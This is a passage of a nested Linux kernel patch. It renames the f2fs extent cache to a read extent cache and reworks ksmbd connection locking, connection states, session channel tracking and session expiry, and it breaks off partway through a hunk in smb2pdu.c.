++		struct extent_tree_info *eti = &sbi->extent_tree[EX_READ];
++
++		mem_size = (atomic_read(&eti->total_ext_tree) *
+ 				sizeof(struct extent_tree) +
+-				atomic_read(&sbi->total_ext_node) *
++				atomic_read(&eti->total_ext_node) *
+ 				sizeof(struct extent_node)) >> PAGE_SHIFT;
+ 		res = mem_size < ((avail_ram * nm_i->ram_thresh / 100) >> 1);
+ 	} else if (type == DISCARD_CACHE) {
+@@ -859,7 +861,7 @@ int f2fs_get_dnode_of_data(struct dnode_of_data *dn, pgoff_t index, int mode)
+ 			blkaddr = data_blkaddr(dn->inode, dn->node_page,
+ 						dn->ofs_in_node + 1);
+ 
+-		f2fs_update_extent_tree_range_compressed(dn->inode,
++		f2fs_update_read_extent_tree_range_compressed(dn->inode,
+ 					index, blkaddr,
+ 					F2FS_I(dn->inode)->i_cluster_size,
+ 					c_len);
+diff --git a/fs/f2fs/node.h b/fs/f2fs/node.h
+index 3c09cae058b0a..0aa48704c77a0 100644
+--- a/fs/f2fs/node.h
++++ b/fs/f2fs/node.h
+@@ -146,7 +146,7 @@ enum mem_type {
+ 	NAT_ENTRIES,	/* indicates the cached nat entry */
+ 	DIRTY_DENTS,	/* indicates dirty dentry pages */
+ 	INO_ENTRIES,	/* indicates inode entries */
+-	EXTENT_CACHE,	/* indicates extent cache */
++	READ_EXTENT_CACHE,	/* indicates read extent cache */
+ 	DISCARD_CACHE,	/* indicates memory of cached discard cmds */
+ 	COMPRESS_PAGE,	/* indicates memory of cached compressed pages */
+ 	BASE_CHECK,	/* check kernel status */
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index b0fbdee16a96c..cbbf95b995414 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -262,7 +262,7 @@ retry:
+ 	f2fs_put_dnode(&dn);
+ 
+ 	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
+-					index, *old_addr, new_addr, recover);
++			index, old_addr ? *old_addr : 0, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -452,8 +452,9 @@ void f2fs_balance_fs_bg(struct f2fs_sb_info *sbi, bool from_bg)
+ 		return;
+ 
+ 	/* try to shrink extent cache when there is no enough memory */
+-	if (!f2fs_available_free_memory(sbi, EXTENT_CACHE))
+-		f2fs_shrink_extent_tree(sbi, EXTENT_CACHE_SHRINK_NUMBER);
++	if (!f2fs_available_free_memory(sbi, READ_EXTENT_CACHE))
++		f2fs_shrink_read_extent_tree(sbi,
++				READ_EXTENT_CACHE_SHRINK_NUMBER);
+ 
+ 	/* check the # of cached NAT entries */
+ 	if (!f2fs_available_free_memory(sbi, NAT_ENTRIES))
+@@ -1473,7 +1474,7 @@ retry:
+ 			goto next;
+ 		if (unlikely(dcc->rbtree_check))
+ 			f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 		blk_start_plug(&plug);
+ 		list_for_each_entry_safe(dc, tmp, pend_list, list) {
+ 			f2fs_bug_on(sbi, dc->state != D_PREP);
+@@ -3001,7 +3002,7 @@ next:
+ 	mutex_lock(&dcc->cmd_lock);
+ 	if (unlikely(dcc->rbtree_check))
+ 		f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 
+ 	dc = (struct discard_cmd *)f2fs_lookup_rb_tree_ret(&dcc->root,
+ 					NULL, start,
+diff --git a/fs/f2fs/shrinker.c b/fs/f2fs/shrinker.c
+index dd3c3c7a90ec8..33c490e69ae30 100644
+--- a/fs/f2fs/shrinker.c
++++ b/fs/f2fs/shrinker.c
+@@ -28,10 +28,13 @@ static unsigned long __count_free_nids(struct f2fs_sb_info *sbi)
+ 	return count > 0 ? count : 0;
+ }
+ 
+-static unsigned long __count_extent_cache(struct f2fs_sb_info *sbi)
++static unsigned long __count_extent_cache(struct f2fs_sb_info *sbi,
++					enum extent_type type)
+ {
+-	return atomic_read(&sbi->total_zombie_tree) +
+-				atomic_read(&sbi->total_ext_node);
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++
++	return atomic_read(&eti->total_zombie_tree) +
++				atomic_read(&eti->total_ext_node);
+ }
+ 
+ unsigned long f2fs_shrink_count(struct shrinker *shrink,
+@@ -53,8 +56,8 @@ unsigned long f2fs_shrink_count(struct shrinker *shrink,
+ 		}
+ 		spin_unlock(&f2fs_list_lock);
+ 
+-		/* count extent cache entries */
+-		count += __count_extent_cache(sbi);
++		/* count read extent cache entries */
++		count += __count_extent_cache(sbi, EX_READ);
+ 
+ 		/* count clean nat cache entries */
+ 		count += __count_nat_entries(sbi);
+@@ -99,8 +102,8 @@ unsigned long f2fs_shrink_scan(struct shrinker *shrink,
+ 
+ 		sbi->shrinker_run_no = run_no;
+ 
+-		/* shrink extent cache entries */
+-		freed += f2fs_shrink_extent_tree(sbi, nr >> 1);
++		/* shrink read extent cache entries */
++		freed += f2fs_shrink_read_extent_tree(sbi, nr >> 1);
+ 
+ 		/* shrink clean nat cache entries */
+ 		if (freed < nr)
+@@ -130,7 +133,7 @@ void f2fs_join_shrinker(struct f2fs_sb_info *sbi)
+ 
+ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi)
+ {
+-	f2fs_shrink_extent_tree(sbi, __count_extent_cache(sbi));
++	f2fs_shrink_read_extent_tree(sbi, __count_extent_cache(sbi, EX_READ));
+ 
+ 	spin_lock(&f2fs_list_lock);
+ 	list_del_init(&sbi->s_list);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 5af05411818a5..c46533d65372c 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -810,10 +810,10 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			set_opt(sbi, FASTBOOT);
+ 			break;
+ 		case Opt_extent_cache:
+-			set_opt(sbi, EXTENT_CACHE);
++			set_opt(sbi, READ_EXTENT_CACHE);
+ 			break;
+ 		case Opt_noextent_cache:
+-			clear_opt(sbi, EXTENT_CACHE);
++			clear_opt(sbi, READ_EXTENT_CACHE);
+ 			break;
+ 		case Opt_noinline_data:
+ 			clear_opt(sbi, INLINE_DATA);
+@@ -1939,7 +1939,7 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+ 		seq_puts(seq, ",fastboot");
+-	if (test_opt(sbi, EXTENT_CACHE))
++	if (test_opt(sbi, READ_EXTENT_CACHE))
+ 		seq_puts(seq, ",extent_cache");
+ 	else
+ 		seq_puts(seq, ",noextent_cache");
+@@ -2057,7 +2057,7 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+-	set_opt(sbi, EXTENT_CACHE);
++	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
+ 	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+@@ -2198,7 +2198,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	bool need_restart_ckpt = false, need_stop_ckpt = false;
+ 	bool need_restart_flush = false, need_stop_flush = false;
+ 	bool need_restart_discard = false, need_stop_discard = false;
+-	bool no_extent_cache = !test_opt(sbi, EXTENT_CACHE);
++	bool no_read_extent_cache = !test_opt(sbi, READ_EXTENT_CACHE);
+ 	bool enable_checkpoint = !test_opt(sbi, DISABLE_CHECKPOINT);
+ 	bool no_io_align = !F2FS_IO_ALIGNED(sbi);
+ 	bool no_atgc = !test_opt(sbi, ATGC);
+@@ -2288,7 +2288,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 	}
+ 
+ 	/* disallow enable/disable extent_cache dynamically */
+-	if (no_extent_cache == !!test_opt(sbi, EXTENT_CACHE)) {
++	if (no_read_extent_cache == !!test_opt(sbi, READ_EXTENT_CACHE)) {
+ 		err = -EINVAL;
+ 		f2fs_warn(sbi, "switch extent_cache option is not allowed");
+ 		goto restore_opts;
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index aa33c39be1829..d387708977a50 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -827,7 +827,7 @@ void wbc_detach_inode(struct writeback_control *wbc)
+ 		 * is okay.  The main goal is avoiding keeping an inode on
+ 		 * the wrong wb for an extended period of time.
+ 		 */
+-		if (hweight32(history) > WB_FRN_HIST_THR_SLOTS)
++		if (hweight16(history) > WB_FRN_HIST_THR_SLOTS)
+ 			inode_switch_wbs(inode, max_id);
+ 	}
+ 
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b8f9d627f241d..e3312fbf4c090 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -20,7 +20,7 @@ static DEFINE_MUTEX(init_lock);
+ static struct ksmbd_conn_ops default_conn_ops;
+ 
+ LIST_HEAD(conn_list);
+-DEFINE_RWLOCK(conn_list_lock);
++DECLARE_RWSEM(conn_list_lock);
+ 
+ /**
+  * ksmbd_conn_free() - free resources of the connection instance
+@@ -32,9 +32,9 @@ DEFINE_RWLOCK(conn_list_lock);
+  */
+ void ksmbd_conn_free(struct ksmbd_conn *conn)
+ {
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_del(&conn->conns_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 
+ 	xa_destroy(&conn->sessions);
+ 	kvfree(conn->request_buf);
+@@ -56,7 +56,7 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 		return NULL;
+ 
+ 	conn->need_neg = true;
+-	conn->status = KSMBD_SESS_NEW;
++	ksmbd_conn_set_new(conn);
+ 	conn->local_nls = load_nls("utf8");
+ 	if (!conn->local_nls)
+ 		conn->local_nls = load_nls_default();
+@@ -84,9 +84,9 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 	return conn;
+ }
+ 
+@@ -95,7 +95,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 	struct ksmbd_conn *t;
+ 	bool ret = false;
+ 
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(t, &conn_list, conns_list) {
+ 		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+ 			continue;
+@@ -103,7 +103,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 		ret = true;
+ 		break;
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 	return ret;
+ }
+ 
+@@ -149,19 +149,47 @@ int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ 	return ret;
+ }
+ 
+-static void ksmbd_conn_lock(struct ksmbd_conn *conn)
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
+ {
+ 	mutex_lock(&conn->srv_mutex);
+ }
+ 
+-static void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+ {
+ 	mutex_unlock(&conn->srv_mutex);
+ }
+ 
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn)
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ {
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
++	struct ksmbd_conn *bind_conn;
++
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+@@ -245,7 +273,7 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	if (!ksmbd_server_running())
+ 		return false;
+ 
+-	if (conn->status == KSMBD_SESS_EXITING)
++	if (ksmbd_conn_exiting(conn))
+ 		return false;
+ 
+ 	if (kthread_should_stop())
+@@ -305,7 +333,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
+-		if (conn->status == KSMBD_SESS_GOOD)
++		if (ksmbd_conn_good(conn))
+ 			max_allowed_pdu_size =
+ 				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+ 		else
+@@ -314,7 +342,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > max_allowed_pdu_size) {
+ 			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+-					conn->status);
++					READ_ONCE(conn->status));
+ 			break;
+ 		}
+ 
+@@ -362,10 +390,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 	}
+ 
+ out:
++	ksmbd_conn_set_releasing(conn);
+ 	/* Wait till all reference dropped to the Server object*/
+ 	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+ 
+-
+ 	if (IS_ENABLED(CONFIG_UNICODE))
+ 		utf8_unload(conn->um);
+ 	unload_nls(conn->local_nls);
+@@ -409,7 +437,7 @@ static void stop_sessions(void)
+ 	struct ksmbd_transport *t;
+ 
+ again:
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+ 		struct task_struct *task;
+ 
+@@ -418,14 +446,14 @@ again:
+ 		if (task)
+ 			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+ 				    task->comm, task_pid_nr(task));
+-		conn->status = KSMBD_SESS_EXITING;
++		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+-			read_unlock(&conn_list_lock);
++			up_read(&conn_list_lock);
+ 			t->ops->shutdown(t);
+-			read_lock(&conn_list_lock);
++			down_read(&conn_list_lock);
+ 		}
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 
+ 	if (!list_empty(&conn_list)) {
+ 		schedule_timeout_interruptible(HZ / 10); /* 100ms */
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 0e3a848defaf3..ad8dfaa48ffb3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -26,7 +26,8 @@ enum {
+ 	KSMBD_SESS_GOOD,
+ 	KSMBD_SESS_EXITING,
+ 	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
+ };
+ 
+ struct ksmbd_stats {
+@@ -140,10 +141,10 @@ struct ksmbd_transport {
+ #define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+ 
+ extern struct list_head conn_list;
+-extern rwlock_t conn_list_lock;
++extern struct rw_semaphore conn_list_lock;
+ 
+ bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+ struct ksmbd_conn *ksmbd_conn_alloc(void);
+ void ksmbd_conn_free(struct ksmbd_conn *conn);
+ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+@@ -162,6 +163,8 @@ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+ void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+ 
+ /*
+  * WARNING
+@@ -169,43 +172,60 @@ void ksmbd_conn_transport_destroy(void);
+  * This is a hack. We will move status to a proper place once we land
+  * a multi-sessions support.
+  */
+-static inline bool ksmbd_conn_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+ }
+ 
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_NEGOTIATE;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+ }
+ 
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_RECONNECT;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+ }
+ 
+-static inline bool ksmbd_conn_exiting(struct ksmbd_work *work)
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_EXITING;
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+ }
+ 
+-static inline void ksmbd_conn_set_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+ }
+ 
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_NEGOTIATE;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+ }
+ 
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_RECONNECT;
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+ }
+ 
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_EXITING;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+ }
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+ #endif /* __CONNECTION_H__ */
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index f19de20c2960c..f07a05f376513 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -137,6 +137,9 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	struct ksmbd_tree_connect *tc;
+ 	unsigned long id;
+ 
++	if (!sess)
++		return -EINVAL;
++
+ 	xa_for_each(&sess->tree_conns, id, tc)
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+ 	xa_destroy(&sess->tree_conns);
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 92b1603b5abeb..ea4b56d570fbb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -30,15 +30,15 @@ struct ksmbd_session_rpc {
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
++	struct channel *chann;
++	unsigned long index;
+ 
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		list_del(&chann->chann_list);
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
+ 		kfree(chann);
+ 	}
+-	write_unlock(&sess->chann_lock);
++
++	xa_destroy(&sess->ksmbd_chann_list);
+ }
+ 
+ static void __session_rpc_close(struct ksmbd_session *sess,
+@@ -153,10 +153,6 @@ void ksmbd_session_destroy(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return;
+ 
+-	down_write(&sessions_table_lock);
+-	hash_del(&sess->hlist);
+-	up_write(&sessions_table_lock);
+-
+ 	if (sess->user)
+ 		ksmbd_free_user(sess->user);
+ 
+@@ -174,76 +170,101 @@ static struct ksmbd_session *__session_lookup(unsigned long long id)
+ 	struct ksmbd_session *sess;
+ 
+ 	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id)
++		if (id == sess->id) {
++			sess->last_active = jiffies;
+ 			return sess;
++		}
+ 	}
+ 	return NULL;
+ }
+ 
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+ 			   struct ksmbd_session *sess)
+ {
+ 	sess->dialect = conn->dialect;
+ 	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
+ 	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+ }
+ 
+ static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
+-
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		if (chann->conn == conn) {
+-			list_del(&chann->chann_list);
+-			kfree(chann);
+-			write_unlock(&sess->chann_lock);
+-			return 0;
+-		}
+-	}
+-	write_unlock(&sess->chann_lock);
++	struct channel *chann;
+ 
+-	return -ENOENT;
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
+ }
+ 
+ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_session *sess;
++	unsigned long id;
+ 
++	down_write(&sessions_table_lock);
+ 	if (conn->binding) {
+ 		int bkt;
++		struct hlist_node *tmp;
+ 
+-		down_write(&sessions_table_lock);
+-		hash_for_each(sessions_table, bkt, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess)) {
+-				up_write(&sessions_table_lock);
+-				goto sess_destroy;
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
+ 			}
+ 		}
+-		up_write(&sessions_table_lock);
+-	} else {
+-		unsigned long id;
+-
+-		xa_for_each(&conn->sessions, id, sess) {
+-			if (!ksmbd_chann_del(conn, sess))
+-				goto sess_destroy;
+-		}
+ 	}
+ 
+-	return;
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
+ 
+-sess_destroy:
+-	if (list_empty(&sess->ksmbd_chann_list)) {
+-		xa_erase(&conn->sessions, sess->id);
+-		ksmbd_session_destroy(sess);
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
+ 	}
++	up_write(&sessions_table_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ 					   unsigned long long id)
+ {
+-	return xa_load(&conn->sessions, id);
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+@@ -252,6 +273,8 @@ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+ 
+ 	down_read(&sessions_table_lock);
+ 	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
+ 	up_read(&sessions_table_lock);
+ 
+ 	return sess;
+@@ -320,6 +343,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	struct ksmbd_session *sess;
+ 	int ret;
+ 
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
+ 	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+ 	if (!sess)
+ 		return NULL;
+@@ -327,32 +353,24 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	if (ksmbd_init_file_table(&sess->file_table))
+ 		goto error;
+ 
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+-	INIT_LIST_HEAD(&sess->ksmbd_chann_list);
++	xa_init(&sess->ksmbd_chann_list);
+ 	INIT_LIST_HEAD(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
+-	rwlock_init(&sess->chann_lock);
+-
+-	switch (protocol) {
+-	case CIFDS_SESSION_FLAG_SMB2:
+-		ret = __init_smb2_session(sess);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		break;
+-	}
+ 
++	ret = __init_smb2_session(sess);
+ 	if (ret)
+ 		goto error;
+ 
+ 	ida_init(&sess->tree_conn_ida);
+ 
+-	if (protocol == CIFDS_SESSION_FLAG_SMB2) {
+-		down_write(&sessions_table_lock);
+-		hash_add(sessions_table, &sess->hlist, sess->id);
+-		up_write(&sessions_table_lock);
+-	}
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
+ 	return sess;
+ 
+ error:
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+index 8934b8ee275ba..51f38e5b61abb 100644
+--- a/fs/ksmbd/mgmt/user_session.h
++++ b/fs/ksmbd/mgmt/user_session.h
+@@ -21,7 +21,6 @@ struct ksmbd_file_table;
+ struct channel {
+ 	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 	struct ksmbd_conn	*conn;
+-	struct list_head	chann_list;
+ };
+ 
+ struct preauth_session {
+@@ -50,8 +49,7 @@ struct ksmbd_session {
+ 	char				sess_key[CIFS_KEY_SIZE];
+ 
+ 	struct hlist_node		hlist;
+-	rwlock_t			chann_lock;
+-	struct list_head		ksmbd_chann_list;
++	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+ 	struct list_head		rpc_handle_list;
+@@ -61,6 +59,7 @@ struct ksmbd_session {
+ 	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 
+ 	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 8c2bc513445c3..8a0ad399f2456 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -93,7 +93,8 @@ static inline int check_conn_state(struct ksmbd_work *work)
+ {
+ 	struct smb_hdr *rsp_hdr;
+ 
+-	if (ksmbd_conn_exiting(work) || ksmbd_conn_need_reconnect(work)) {
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
+ 		rsp_hdr = work->response_buf;
+ 		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+ 		return 1;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index acd66fb40c5f0..8f96b96dbac1a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -74,14 +74,7 @@ static inline bool check_session_id(struct ksmbd_conn *conn, u64 id)
+ 
